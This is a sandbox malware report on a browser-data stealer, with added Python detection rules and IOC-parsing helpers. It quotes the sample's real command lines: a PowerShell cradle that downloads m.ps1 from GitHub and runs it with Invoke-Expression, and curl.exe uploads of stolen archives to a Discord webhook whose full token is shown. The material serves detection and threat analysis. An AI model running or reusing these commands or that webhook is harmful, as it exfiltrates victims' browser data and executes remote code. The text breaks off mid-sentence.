Analysis Overview
SHA256
9d6b004b06d43ac61aaf4c368987f2c6eef854c6f32cf5286666520ef213f2b7
Threat Level: Known bad
The file 9d6b004b06d43ac61aaf4c368987f2c6eef854c6f32cf5286666520ef213f2b7.zip was found to be: Known bad.
Malicious Activity Summary
An open source browser data exporter written in golang.
Hackbrowserdata family
Blocklisted process makes network request
Command and Scripting Interpreter: PowerShell
Reads user/profile data of web browsers
Checks computer location settings
Legitimate hosting services abused for malware hosting/C2
Enumerates physical storage devices
Unsigned PE
Browser Information Discovery
Suspicious use of AdjustPrivilegeToken
Suspicious behavior: EnumeratesProcesses
Suspicious use of WriteProcessMemory
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2025-01-17 06:15
Signatures
An open source browser data exporter written in golang.
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Hackbrowserdata family
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Analysis: behavioral10
Detonation Overview
Submitted
2025-01-17 06:15
Reported
2025-01-17 06:17
Platform
win10v2004-20241007-en
Max time kernel
93s
Max time network
146s
Command Line
Signatures
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\i965652f-main\grab.ps1
C:\Windows\system32\curl.exe
"C:\Windows\system32\curl.exe" -F file1=@C:\Users\Admin\AppData\Local\Temp\bdata.zip https://discord.com/api/webhooks/1328938992582004777/NCObLIgTpDFoxApJ4geqLupNNh9CqmkiVQDypmNgbG3AZKV8vwV0Y9ogkx003POFrs6n
C:\Windows\system32\curl.exe
"C:\Windows\system32\curl.exe" -F file1=@C:\Users\Admin\AppData\Local\Temp\e.zip https://discord.com/api/webhooks/1328938992582004777/NCObLIgTpDFoxApJ4geqLupNNh9CqmkiVQDypmNgbG3AZKV8vwV0Y9ogkx003POFrs6n
C:\Windows\system32\curl.exe
"C:\Windows\system32\curl.exe" -F file1=@C:\Users\Admin\AppData\Local\Temp\exclude.zip https://discord.com/api/webhooks/1328938992582004777/NCObLIgTpDFoxApJ4geqLupNNh9CqmkiVQDypmNgbG3AZKV8vwV0Y9ogkx003POFrs6n
C:\Windows\system32\curl.exe
"C:\Windows\system32\curl.exe" -F file1=@C:\Users\Admin\AppData\Local\Temp\file.zip https://discord.com/api/webhooks/1328938992582004777/NCObLIgTpDFoxApJ4geqLupNNh9CqmkiVQDypmNgbG3AZKV8vwV0Y9ogkx003POFrs6n
C:\Windows\system32\curl.exe
"C:\Windows\system32\curl.exe" -F file1=@C:\Users\Admin\AppData\Local\Temp\grab.zip https://discord.com/api/webhooks/1328938992582004777/NCObLIgTpDFoxApJ4geqLupNNh9CqmkiVQDypmNgbG3AZKV8vwV0Y9ogkx003POFrs6n
C:\Windows\system32\curl.exe
"C:\Windows\system32\curl.exe" -F file1=@C:\Users\Admin\AppData\Local\Temp\m.zip https://discord.com/api/webhooks/1328938992582004777/NCObLIgTpDFoxApJ4geqLupNNh9CqmkiVQDypmNgbG3AZKV8vwV0Y9ogkx003POFrs6n
C:\Windows\system32\curl.exe
"C:\Windows\system32\curl.exe" -F file1=@C:\Users\Admin\AppData\Local\Temp\svhost.zip https://discord.com/api/webhooks/1328938992582004777/NCObLIgTpDFoxApJ4geqLupNNh9CqmkiVQDypmNgbG3AZKV8vwV0Y9ogkx003POFrs6n
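The process lists in these runs describe the whole chain: svhost.vbs (via WScript.exe) and file.bat (via cmd.exe) each spawn a PowerShell download cradle that fetches m.ps1 from raw.githubusercontent.com and runs it with Invoke-Expression, while grab.ps1 stages the collected data as .zip files under %TEMP% and hands each one to the built-in curl.exe for a multipart POST to a Discord webhook. The Python below is an added example, not part of this report or of the sample: a small set of command-line rules that flag each of those stages when run over process-creation logs. The report's own command lines are the input; the two benign control lines, the rule names, the regular expressions and the ATT&CK IDs in the comments are mine. The second path segment of the webhook URL is the secret that authorizes posting to the channel, so the helper records only the numeric webhook ID.

```python
import re

# Process command lines copied from the behavioral runs in this report
# (grab.ps1 and curl.exe from behavioral10, svhost.vbs from behavioral13/14,
# file.bat and the IEX cradle from behavioral7/8).
REPORT_CMDLINES = [
    r"powershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\i965652f-main\grab.ps1",
    r'"C:\Windows\system32\curl.exe" -F file1=@C:\Users\Admin\AppData\Local\Temp\bdata.zip https://discord.com/api/webhooks/1328938992582004777/NCObLIgTpDFoxApJ4geqLupNNh9CqmkiVQDypmNgbG3AZKV8vwV0Y9ogkx003POFrs6n',
    r'"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\i965652f-main\svhost.vbs"',
    r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -c "$script = iwr http://raw.githubusercontent.com/k53xupn43/i965652f/refs/heads/main/m.ps1; invoke-expression $script"',
    r'cmd /c "C:\Users\Admin\AppData\Local\Temp\i965652f-main\file.bat"',
    r'''powershell.exe -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -Command "Invoke-Expression (Invoke-WebRequest -Uri 'https://raw.githubusercontent.com/k53xupn43/i965652f/refs/heads/main/m.ps1').Content"''',
]

# Constructed benign control lines (not from the report) to show the rules stay quiet on them.
BENIGN_CMDLINES = [
    r"powershell.exe -NoProfile -File C:\Scripts\nightly-backup.ps1",
    r'"C:\Windows\system32\curl.exe" -sS -o C:\Temp\release.json https://api.github.com/repos/example/app/releases/latest',
]

RULES = {
    # T1059.001: execution policy overridden on the command line
    "ps_execpolicy_bypass": re.compile(r"powershell(?:\.exe)?\b.*?-(?:ExecutionPolicy|ep)\s+bypass", re.I),
    # T1059.001 + T1105: download-and-eval cradle, in either operand order
    "ps_download_cradle": re.compile(
        r"\b(?:iwr|Invoke-WebRequest|DownloadString)\b.*?\b(?:iex|Invoke-Expression)\b"
        r"|\b(?:iex|Invoke-Expression)\b.*?\b(?:iwr|Invoke-WebRequest|DownloadString)\b", re.I),
    "ps_hidden_window": re.compile(r"-WindowStyle\s+Hidden", re.I),
    # T1567: multipart upload of a local file to a Discord webhook with the built-in curl.exe
    "curl_discord_webhook_upload": re.compile(
        r"curl(?:\.exe)?\b.*?\s-(?:F|-form)\s+\S+=@.*?discord(?:app)?\.com/api/webhooks/", re.I),
    # T1059.005 / T1059.003: script hosts launched on files dropped under %TEMP%
    "wscript_temp_vbs": re.compile(r"wscript(?:\.exe)?\b.*?\\AppData\\Local\\Temp\\.*?\.vbs", re.I),
    "cmd_temp_bat": re.compile(r"cmd(?:\.exe)?\b.*?/c\s+\"?.*?\\AppData\\Local\\Temp\\.*?\.bat", re.I),
}
WEBHOOK_RE = re.compile(r"discord(?:app)?\.com/api/webhooks/(\d+)/[A-Za-z0-9_\-]+", re.I)


def classify(cmdline):
    """Names of every rule that matches one process command line."""
    return [name for name, rx in RULES.items() if rx.search(cmdline)]


def webhook_id(cmdline):
    """Numeric Discord webhook ID from a command line, deliberately without the token."""
    m = WEBHOOK_RE.search(cmdline)
    return m.group(1) if m else None


def triage(cmdlines):
    """Flagged command lines with their rule hits and any webhook ID seen."""
    hits = []
    for c in cmdlines:
        rules = classify(c)
        if rules:
            hits.append({"cmdline": c, "rules": rules, "webhook_id": webhook_id(c)})
    return hits


if __name__ == "__main__":
    for h in triage(REPORT_CMDLINES + BENIGN_CMDLINES):
        print(", ".join(h["rules"]), "|", h["cmdline"][:80])
```

In production the same expressions go against the CommandLine field of Sysmon Event ID 1 or Security 4688; the cmd.exe and WScript.exe rules are the cheapest early signal here because they fire before the cradle ever touches the network.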
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | discord.com | udp |
| US | 162.159.136.232:443 | discord.com | tcp |
| US | 8.8.8.8:53 | 209.205.72.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 232.136.159.162.in-addr.arpa | udp |
| US | 162.159.136.232:443 | discord.com | tcp |
| US | 8.8.8.8:53 | c.pki.goog | udp |
| US | 8.8.8.8:53 | 2.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 7.98.22.2.in-addr.arpa | udp |
| GB | 142.250.178.3:80 | c.pki.goog | tcp |
| US | 8.8.8.8:53 | 3.178.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 104.219.191.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 28.118.140.52.in-addr.arpa | udp |
| US | 162.159.136.232:443 | discord.com | tcp |
| US | 162.159.136.232:443 | discord.com | tcp |
| US | 162.159.136.232:443 | discord.com | tcp |
| US | 8.8.8.8:53 | 200.163.202.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.31.95.13.in-addr.arpa | udp |
| US | 162.159.136.232:443 | discord.com | tcp |
| US | 162.159.136.232:443 | discord.com | tcp |
| US | 162.159.136.232:443 | discord.com | tcp |
| US | 8.8.8.8:53 | 86.49.80.91.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 181.129.81.91.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 11.227.111.52.in-addr.arpa | udp |
Files
memory/3828-0-0x00007FFDC4013000-0x00007FFDC4015000-memory.dmp
memory/3828-7-0x000001A3DDFE0000-0x000001A3DE002000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ffo1zloo.uww.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/3828-11-0x00007FFDC4010000-0x00007FFDC4AD1000-memory.dmp
memory/3828-12-0x00007FFDC4010000-0x00007FFDC4AD1000-memory.dmp
memory/3828-13-0x000001A3DE520000-0x000001A3DE6E2000-memory.dmp
memory/3828-14-0x000001A3DEC20000-0x000001A3DF148000-memory.dmp
memory/3828-15-0x00007FFDC4010000-0x00007FFDC4AD1000-memory.dmp
memory/3828-16-0x00007FFDC4010000-0x00007FFDC4AD1000-memory.dmp
memory/3828-18-0x000001A3C5870000-0x000001A3C587A000-memory.dmp
memory/3828-17-0x000001A3DE070000-0x000001A3DE082000-memory.dmp
memory/3828-20-0x00007FFDC4013000-0x00007FFDC4015000-memory.dmp
memory/3828-21-0x00007FFDC4010000-0x00007FFDC4AD1000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\bdata.zip
| MD5 | e38d77d89d87d9dc6975a8c52049ba18 |
| SHA1 | 6aee028ef6d2327233466e51dd4c293a28cd43c4 |
| SHA256 | 658991e9ec65890494a0e7051d41f79f2c7fbba978e64cf577c552d1089f295d |
| SHA512 | ebfaaac981a1189864503526de626ae49de3ded78ab464c31fc441e866e894aca10817c7c96a35ee5d113dfc7aaf3ef619205abe9a4b1fafeb1c2ed9e85bf637 |
memory/3828-23-0x00007FFDC4010000-0x00007FFDC4AD1000-memory.dmp
memory/3828-24-0x00007FFDC4010000-0x00007FFDC4AD1000-memory.dmp
memory/3828-25-0x00007FFDC4010000-0x00007FFDC4AD1000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\e.zip
| MD5 | 9a8e90d4abda1500466b8970c6a36982 |
| SHA1 | 057b038c0a91654f5a51e45deb94247e0d7c5e3d |
| SHA256 | 214b9a2f9f18be94fb5ce10b3e4007099d56df2a9978a2175af9fd98c375b7e2 |
| SHA512 | abe05046effb8903a2dcf711ce302a26967e7fa34b9c9488bebaf1aafe0842745488e84417987ab4f2aaffbde8e2dddb4f6116f23124cb5bcfcf3c9c376c1a7e |
C:\Users\Admin\AppData\Local\Temp\exclude.zip
| MD5 | f868c684d24aa6e8c3a1451e00016900 |
| SHA1 | b7c2370e5d4d886df82456708d9e9b6553939286 |
| SHA256 | ea0301e41e0222f736260bebcdf5250fdd6283854837a6c3356221b554e96244 |
| SHA512 | a83e08de2506c61af0fe933265273f05164bcc30e90500c09b518e6b9238330d0cf2db21915b4f4bb0c09f50f41e6b3fcc73a3d883aaa42f4dc60ac4926faa43 |
C:\Users\Admin\AppData\Local\Temp\file.zip
| MD5 | 7ed554c7a827ba84c1d340fe966a2db9 |
| SHA1 | ca39dd825b902a3c853d170312b89a3198e0d67f |
| SHA256 | 6d06797176b04baf550c01724281cc1d1ab5b40d18314c00eb3ae767775ca99c |
| SHA512 | 0490283cba37a2c2cda88976ada55b81a967c6ccd5373445007f7c72f96205cd33bf54341ab298a077a947da8f4d66c387dc0e1ef0ada99505aac40e66d5187d |
C:\Users\Admin\AppData\Local\Temp\grab.zip
| MD5 | 0632e6262f80957d689873cd171ef4eb |
| SHA1 | 59ebd357f65af9b6923c93f4a5d2ab959f674ca9 |
| SHA256 | 5384b0d039f2a3c0a2d0c76aaea6f02f53af13f10d1b059932fbfd686e72f84e |
| SHA512 | 54b7e19fb935fc55f2be6ceb6bbe6205f51c299406db83cd9e14472c89f6be0ff33ab1a217c203d3d873b9d0392c09b8fec7f92012d2a91446998b8ab6b0fb69 |
C:\Users\Admin\AppData\Local\Temp\m.zip
| MD5 | 3e9da8af20794b88518123e7726a1090 |
| SHA1 | d41b522d24cb6d0860702d0fd89b12ec6bcbe056 |
| SHA256 | c984bc8481dc293ba634a76b05f875feda1adaf346fb5d977ff12d6f284443d6 |
| SHA512 | 862021501b0af52bc31f1f71d1136eb6dc586f425a586c5e7b3af433d34b3cc7bbfcc5e4e12f0526c4652f972d12518d59075285c40ca968b9930fb74ceefe42 |
C:\Users\Admin\AppData\Local\Temp\svhost.zip
| MD5 | 2b554843f7216d4fc3966daf6a8d113e |
| SHA1 | ee38847558c8d215357c512d952a3081dd582aea |
| SHA256 | 66d56f48c653b00867af782c7fa90e33213270f2c54b9eeb744058fe2f54e17f |
| SHA512 | f258ef8eb692a7e21ab64cfe80f0e27f82706cbbf97d1aeec3b6fbd34855d9b76ba6fb1796c4e9265e7f5e25aa55c1b6026e369a00aebaeab49eec8d5ff57328 |
memory/3828-40-0x00007FFDC4010000-0x00007FFDC4AD1000-memory.dmp
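Two things in this Files list deserve a caveat before the hashes go into a block list. The __PSScriptPolicyTest_*.ps1 file is not dropped by the sample: PowerShell writes that probe into %TEMP% on start-up to test whether AppLocker or WDAC enforces script policy, its content is fixed, and that is why the same MD5 d17fe0a3f47be24a6453e9ef58c94641 appears in this run and in behavioral8, behavioral12 and behavioral14 under a different random name each time. The seven .zip files, by contrast, are exactly the archives the curl.exe command lines above upload to the webhook, so their hashes are the IOCs worth keeping. The Python below is an added example, not from the report: it parses a copied excerpt of this Files section, drops memory dumps, tags the policy probe by name or by that observed MD5, and returns only the SHA-256 values of the staged archives. The record kinds and the regular expressions are mine.

```python
import re

# Excerpt of the behavioral10 "Files" section above (copied from the report, not constructed).
FILES_EXCERPT = r"""
memory/3828-7-0x000001A3DDFE0000-0x000001A3DE002000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ffo1zloo.uww.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
memory/3828-11-0x00007FFDC4010000-0x00007FFDC4AD1000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\bdata.zip
| MD5 | e38d77d89d87d9dc6975a8c52049ba18 |
| SHA1 | 6aee028ef6d2327233466e51dd4c293a28cd43c4 |
| SHA256 | 658991e9ec65890494a0e7051d41f79f2c7fbba978e64cf577c552d1089f295d |
C:\Users\Admin\AppData\Local\Temp\e.zip
| MD5 | 9a8e90d4abda1500466b8970c6a36982 |
| SHA1 | 057b038c0a91654f5a51e45deb94247e0d7c5e3d |
| SHA256 | 214b9a2f9f18be94fb5ce10b3e4007099d56df2a9978a2175af9fd98c375b7e2 |
"""

HASH_ROW = re.compile(r"^\|\s*(MD5|SHA1|SHA256|SHA512)\s*\|\s*([0-9a-fA-F]+)\s*\|$")
# PowerShell drops this probe into %TEMP% at start-up to test AppLocker/WDAC script
# enforcement; its content is fixed, hence the identical MD5 in every run of this report.
POLICY_PROBE_NAME = re.compile(r"\\__PSScriptPolicyTest_[^\\]+\.ps1$", re.I)
POLICY_PROBE_MD5 = {"d17fe0a3f47be24a6453e9ef58c94641"}   # value observed in this report
TEMP_ZIP = re.compile(r"\\AppData\\Local\\Temp\\[^\\]+\.zip$", re.I)


def classify_path(path):
    """Assumed record kinds for this report's file artifacts."""
    if POLICY_PROBE_NAME.search(path):
        return "powershell_policy_probe"
    if TEMP_ZIP.search(path):
        return "staged_archive"      # the files curl.exe later uploads to the webhook
    return "artifact"


def parse_files_section(text):
    """Turn the report's path-then-hash-rows layout into one record per file."""
    records, current = [], None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        m = HASH_ROW.match(line)
        if m:
            if current is not None:
                current["hashes"][m.group(1).lower()] = m.group(2).lower()
            continue
        if line.startswith("|") or line.startswith("memory/"):
            current = None          # other table rows and memory dumps carry no file hash
            continue
        current = {"path": line, "kind": classify_path(line), "hashes": {}}
        records.append(current)
    return records


def is_policy_probe(record):
    return (record["kind"] == "powershell_policy_probe"
            or record["hashes"].get("md5") in POLICY_PROBE_MD5)


def extract_sha256_iocs(records):
    """SHA-256 values worth blocking or hunting for: everything except PowerShell's own probe."""
    return [r["hashes"]["sha256"] for r in records
            if not is_policy_probe(r) and "sha256" in r["hashes"]]


if __name__ == "__main__":
    recs = parse_files_section(FILES_EXCERPT)
    for r in recs:
        print(r["kind"], r["path"], r["hashes"].get("sha256"))
    print(extract_sha256_iocs(recs))
```

The archive hashes are specific to this detonation (the contents depend on the victim's browser profiles), so they identify this run of the stealer rather than the family; the file names and the curl.exe upload pattern travel better across victims.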
Analysis: behavioral13
Detonation Overview
Submitted
2025-01-17 06:15
Reported
2025-01-17 06:17
Platform
win7-20240903-en
Max time kernel
119s
Max time network
120s
Command Line
Signatures
Enumerates physical storage devices
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 1668 wrote to memory of 2524 | N/A | C:\Windows\System32\WScript.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 1668 wrote to memory of 2524 | N/A | C:\Windows\System32\WScript.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 1668 wrote to memory of 2524 | N/A | C:\Windows\System32\WScript.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Processes
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\i965652f-main\svhost.vbs"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -c "$script = iwr http://raw.githubusercontent.com/k53xupn43/i965652f/refs/heads/main/m.ps1; invoke-expression $script"
Network
Files
memory/2524-4-0x000007FEF5DDE000-0x000007FEF5DDF000-memory.dmp
memory/2524-5-0x000000001B770000-0x000000001BA52000-memory.dmp
memory/2524-6-0x0000000001E10000-0x0000000001E18000-memory.dmp
memory/2524-7-0x000007FEF5B20000-0x000007FEF64BD000-memory.dmp
memory/2524-9-0x000007FEF5B20000-0x000007FEF64BD000-memory.dmp
memory/2524-8-0x000007FEF5B20000-0x000007FEF64BD000-memory.dmp
memory/2524-11-0x000007FEF5B20000-0x000007FEF64BD000-memory.dmp
memory/2524-10-0x000007FEF5B20000-0x000007FEF64BD000-memory.dmp
memory/2524-12-0x000007FEF5B20000-0x000007FEF64BD000-memory.dmp
Analysis: behavioral3
Detonation Overview
Submitted
2025-01-17 06:15
Reported
2025-01-17 06:17
Platform
win7-20240729-en
Max time kernel
118s
Max time network
119s
Command Line
Signatures
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\i965652f-main\e.ps1
Network
Files
memory/2564-4-0x000007FEF5D0E000-0x000007FEF5D0F000-memory.dmp
memory/2564-6-0x0000000002240000-0x0000000002248000-memory.dmp
memory/2564-5-0x000000001B610000-0x000000001B8F2000-memory.dmp
memory/2564-7-0x000007FEF5A50000-0x000007FEF63ED000-memory.dmp
memory/2564-8-0x000007FEF5A50000-0x000007FEF63ED000-memory.dmp
memory/2564-9-0x000007FEF5A50000-0x000007FEF63ED000-memory.dmp
memory/2564-10-0x000007FEF5A50000-0x000007FEF63ED000-memory.dmp
Analysis: behavioral7
Detonation Overview
Submitted
2025-01-17 06:15
Reported
2025-01-17 06:17
Platform
win7-20240903-en
Max time kernel
119s
Max time network
120s
Command Line
Signatures
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2996 wrote to memory of 2308 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 2996 wrote to memory of 2308 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 2996 wrote to memory of 2308 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Processes
C:\Windows\system32\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\i965652f-main\file.bat"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -Command "Invoke-Expression (Invoke-WebRequest -Uri 'https://raw.githubusercontent.com/k53xupn43/i965652f/refs/heads/main/m.ps1').Content"
Network
Files
memory/2308-4-0x000007FEF5FDE000-0x000007FEF5FDF000-memory.dmp
memory/2308-5-0x000000001B640000-0x000000001B922000-memory.dmp
memory/2308-9-0x000007FEF5D20000-0x000007FEF66BD000-memory.dmp
memory/2308-8-0x000007FEF5D20000-0x000007FEF66BD000-memory.dmp
memory/2308-7-0x000007FEF5D20000-0x000007FEF66BD000-memory.dmp
memory/2308-6-0x0000000001D90000-0x0000000001D98000-memory.dmp
memory/2308-11-0x000007FEF5D20000-0x000007FEF66BD000-memory.dmp
memory/2308-10-0x000007FEF5D20000-0x000007FEF66BD000-memory.dmp
memory/2308-12-0x000007FEF5D20000-0x000007FEF66BD000-memory.dmp
Analysis: behavioral8
Detonation Overview
Submitted
2025-01-17 06:15
Reported
2025-01-17 06:17
Platform
win10v2004-20241007-en
Max time kernel
140s
Max time network
150s
Command Line
Signatures
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 3156 wrote to memory of 4744 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 3156 wrote to memory of 4744 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Processes
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\i965652f-main\file.bat"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -Command "Invoke-Expression (Invoke-WebRequest -Uri 'https://raw.githubusercontent.com/k53xupn43/i965652f/refs/heads/main/m.ps1').Content"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | raw.githubusercontent.com | udp |
| US | 185.199.108.133:443 | raw.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 209.205.72.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| IN | 64.227.161.180:4443 |  | tcp |
| US | 8.8.8.8:53 | 180.129.81.91.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 69.31.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 7.98.22.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 28.118.140.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 104.219.191.52.in-addr.arpa | udp |
| IN | 64.227.161.180:4443 |  | tcp |
| US | 8.8.8.8:53 | 53.210.109.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.31.95.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.214.232.199.in-addr.arpa | udp |
| IN | 64.227.161.180:4443 |  | tcp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| IN | 64.227.161.180:4443 |  | tcp |
| US | 8.8.8.8:53 | 13.227.111.52.in-addr.arpa | udp |
| IN | 64.227.161.180:4443 |  | tcp |
| IN | 64.227.161.180:4443 |  | tcp |
| IN | 64.227.161.180:4443 |  | tcp |
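Every run that reached m.ps1 (behavioral8, behavioral11, behavioral12 and behavioral14) shows the same thing in its Network table: repeated TCP connections to 64.227.161.180 on port 4443 with no name resolved for it. The reverse (in-addr.arpa) lookups interleaved with them are issued by Windows for peer addresses and are background rather than attacker-driven; they appear even in behavioral4, where the only process was e.ps1 and nothing else touched the network. The report does not capture what m.ps1 does over that connection, so the purpose of the 4443 channel is not established here. The Python below is an added example, not from the report: it parses a copied subset of this run's rows, separates the PTR noise, and surfaces repeated direct-IP connections on non-web ports. The parser finds the Proto cell by value, so rows with an empty or missing Domain cell are accepted; the three-hit threshold and the 80/443 exclusion are 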